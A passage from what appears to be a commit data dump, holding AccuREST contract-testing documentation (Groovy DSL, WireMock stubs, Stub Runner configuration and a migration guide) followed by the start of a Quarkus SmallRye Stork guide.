\"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. 
The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. 
It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also 
possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. 
\nAn example of a generated test:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a WireMock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from WireMock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nSince you are developing the stub of service Y, you need to be sure that it actually resembles your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application\nbehaves in a different way in production.\n\nThat's why acceptance tests will be generated from the provided stub, ensuring\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values for the request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to a proper naming convention while creating your contracts. The convention requires including an order number followed by an underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch a tree will cause Accurest to generate a WireMock scenario named `scenario1` with three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about WireMock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with a guaranteed order of execution.\n
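\nFor illustration only, the first step of such a scenario could look roughly like this in WireMock's stub JSON (the field names come from WireMock's stateful behaviour support; the request and response shown here are made up):\n\n[source,javascript,indent=0]\n----\n{\n \"scenarioName\" : \"scenario1\",\n \"requiredScenarioState\" : \"Started\",\n \"newScenarioState\" : \"Step1\",\n \"request\" : {\n \"url\" : \"\/login\",\n \"method\" : \"POST\"\n },\n \"response\" : {\n \"status\" : 200\n }\n}\n----\n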
\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was passing the generated WireMock JSON stubs from the server side to the client side (or to various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of an AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = wiremockStubsOutputDirRoot\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nAn example of a Maven setup can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (this includes the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules:\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains the core logic of Stub Runner. It gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. 
Defaults to 'false'\n (default: false)\n----\n\nYou can produce a fat jar and run the app as presented above.\n\nYou can also configure Stub Runner from Gradle, either by passing the full arguments list with `-Pargs`, like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor by passing each parameter separately with a `-P` prefix, without the hyphen (-) in the name of the parameter:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for a given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\t\t\t.downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed, Stub Runner connects to your Maven repository and, for the given list of dependencies, tries to:\n\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses the [Groovy Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check the [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince `AccurestRule` implements the `StubFinder` interface, it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. 
You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass 
StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* section for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on the classpath, and a bean of type `StubFinder` will automatically get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the repetitive properties can be set using system properties or, for Spring, property sources. Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs\n|stubrunner.port.range.max|15000| Maximum value of a port for a started WireMock with stubs\n|stubrunner.stubs.repository.root|| Maven repo URL. If blank then will call the local Maven repo\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download\n|======================\n
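\nFor example, assuming the stub artifacts used earlier in this chapter, a global configuration passed as system properties to the JVM running your tests could look like this (all values are illustrative):\n\n[source,indent=0]\n----\n-Dstubrunner.stubs.repository.root=http:\/\/your.repo.com\n-Dstubrunner.port.range.min=12000\n-Dstubrunner.port.range.max=12500\n-Dstubrunner.stubs=io.codearte.accurest.stubs:loanIssuance,io.codearte.accurest.stubs:fraudDetectionServer\n----\n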
\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed the package name (coderate to codearte), so you have to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but the tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d46d7c25175ea149e524cfdd5321af2c1b2d67d","subject":"Fixed error in Stork guide","message":"Fixed error in Stork guide\n\nSigned-off-by: Helber Belmiro <acae567605c3b6ad01310ceb8780b22694b0e829@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/stork.adoc","new_file":"docs\/src\/main\/asciidoc\/stork.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Getting Started with SmallRye Stork\n:extension-status: preview\n\ninclude::_attributes.adoc[]\n\nThe essence of distributed systems resides in the interaction between services.\nIn modern architecture, you often have multiple instances of your service to share the load or improve the resilience by redundancy.\nBut how do you select the best instance of your service?\nThat's where https:\/\/smallrye.io\/smallrye-stork[SmallRye Stork] helps.\nStork is going to choose the most appropriate instance.\nIt offers:\n\n* Extensible service discovery mechanisms\n* Built-in support for Consul and Kubernetes\n* Customizable client load-balancing strategies\n\ninclude::{includes}\/extension-status.adoc[]\n\n== Prerequisites\n\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n\n== Architecture\n\nIn this guide, we will build an application composed of:\n\n* A simple blue service exposed on port 9000\n* A simple red service exposed on port 9001\n* A REST Client calling the blue or red service (the selection is delegated to Stork)\n* A REST endpoint using the REST client and calling the services\n* The blue and red services are registered in https:\/\/www.consul.io\/[Consul].\n\nimage::stork-getting-started-architecture.png[Architecture of the application,width=50%, align=center]\n\nFor the sake of simplicity, everything (except Consul) will be running in the same Quarkus application.\nOf course, each component will run in its own process in the real world.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the applications step by step.\nHowever, you can go right to the completed 